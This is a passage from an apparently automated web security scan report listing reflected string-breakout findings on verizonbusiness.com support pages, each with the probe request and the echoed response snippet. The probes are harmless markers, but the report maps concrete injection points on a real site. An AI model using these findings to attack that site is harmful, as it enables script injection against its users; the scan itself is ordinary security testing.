//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM
...[SNIP]...

1.1062. http://www.verizonbusiness.com/support/myaccount/tools/center/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/center/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9a68'%3bfdfc0594f24 was submitted in the REST URL parameter 1. This input was echoed as d9a68';fdfc0594f24 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /supportd9a68'%3bfdfc0594f24/myaccount/tools/center/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:32:46 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40660
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:32:46 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:32:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/supportd9a68';fdfc0594f24/myaccount/tools/center/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1063. http://www.verizonbusiness.com/support/myaccount/tools/center/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/center/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efefe"%3ba0dbaef307b was submitted in the REST URL parameter 2. This input was echoed as efefe";a0dbaef307b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/myaccountefefe"%3ba0dbaef307b/tools/center/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:33:15 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40660
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:33:15 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:33:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/support/myaccountefefe";a0dbaef307b/tools/center/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS O
...[SNIP]...

1.1064. http://www.verizonbusiness.com/support/myaccount/tools/center/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/center/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d5f85'%3bd8a17e6ccec was submitted in the REST URL parameter 2. This input was echoed as d5f85';d8a17e6ccec in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/myaccountd5f85'%3bd8a17e6ccec/tools/center/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:34:03 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40660
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:34:03 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:34:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/support/myaccountd5f85';d8a17e6ccec/tools/center/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1065. http://www.verizonbusiness.com/support/myaccount/tools/center/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/center/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46b7d"%3b63e98bf77e0 was submitted in the REST URL parameter 3. This input was echoed as 46b7d";63e98bf77e0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/myaccount/tools46b7d"%3b63e98bf77e0/center/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:13 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43860
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:13 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:13 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/support/myaccount/tools46b7d";63e98bf77e0/center/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBM
...[SNIP]...

1.1066. http://www.verizonbusiness.com/support/myaccount/tools/center/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/center/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3b71'%3b40115d7665b was submitted in the REST URL parameter 3. This input was echoed as d3b71';40115d7665b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/myaccount/toolsd3b71'%3b40115d7665b/center/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:20 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43862
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:20 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:20 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/support/myaccount/toolsd3b71';40115d7665b/center/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1067. http://www.verizonbusiness.com/support/myaccount/tools/center/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/center/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e2e6"%3b1b8527b1fb2 was submitted in the REST URL parameter 4. This input was echoed as 9e2e6";1b8527b1fb2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/myaccount/tools/center9e2e6"%3b1b8527b1fb2/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:43 GMT
Content-Type: text/html
Content-Length: 46512
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:43 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:43 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/support/myaccount/tools/center9e2e6";1b8527b1fb2/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1068. http://www.verizonbusiness.com/support/myaccount/tools/center/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/center/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 582bc'%3bb721382ff28 was submitted in the REST URL parameter 4. This input was echoed as 582bc';b721382ff28 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/myaccount/tools/center582bc'%3bb721382ff28/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:11 GMT
Content-Type: text/html
Content-Length: 46512
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:11 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/support/myaccount/tools/center582bc';b721382ff28/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1069. http://www.verizonbusiness.com/support/myaccount/tools/ebonding/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/ebonding/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3685'%3b8d328b9c15e was submitted in the REST URL parameter 1. This input was echoed as a3685';8d328b9c15e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /supporta3685'%3b8d328b9c15e/myaccount/tools/ebonding/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:32:40 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40664
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:32:40 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:32:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/supporta3685';8d328b9c15e/myaccount/tools/ebonding/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1070. http://www.verizonbusiness.com/support/myaccount/tools/ebonding/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/ebonding/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba852"%3b33b10fd7459 was submitted in the REST URL parameter 1. This input was echoed as ba852";33b10fd7459 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /supportba852"%3b33b10fd7459/myaccount/tools/ebonding/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:32:22 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40664
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:32:22 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:32:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/supportba852";33b10fd7459/myaccount/tools/ebonding/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMU
...[SNIP]...

1.1071. http://www.verizonbusiness.com/support/myaccount/tools/ebonding/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/ebonding/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7f0c'%3b13a81df5fc4 was submitted in the REST URL parameter 2. This input was echoed as a7f0c';13a81df5fc4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/myaccounta7f0c'%3b13a81df5fc4/tools/ebonding/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:33:48 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40664
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:33:48 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:33:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/support/myaccounta7f0c';13a81df5fc4/tools/ebonding/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1072. http://www.verizonbusiness.com/support/myaccount/tools/ebonding/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/ebonding/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4dd10"%3b23e36652da was submitted in the REST URL parameter 2. This input was echoed as 4dd10";23e36652da in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/myaccount4dd10"%3b23e36652da/tools/ebonding/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:33:08 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40662
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:33:08 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:33:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/support/myaccount4dd10";23e36652da/tools/ebonding/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.1073. http://www.verizonbusiness.com/support/myaccount/tools/ebonding/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/ebonding/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e2f3"%3bfb914e7b21b was submitted in the REST URL parameter 3. This input was echoed as 7e2f3";fb914e7b21b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/myaccount/tools7e2f3"%3bfb914e7b21b/ebonding/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:03 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43864
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:03 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/support/myaccount/tools7e2f3";fb914e7b21b/ebonding/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SU
...[SNIP]...

1.1074. http://www.verizonbusiness.com/support/myaccount/tools/ebonding/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/ebonding/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a04cd'%3be55fbd83fcc was submitted in the REST URL parameter 3. This input was echoed as a04cd';e55fbd83fcc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/myaccount/toolsa04cd'%3be55fbd83fcc/ebonding/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:10 GMT
Content-Type: text/html
Content-Length: 43866
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:10 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:10 GMT

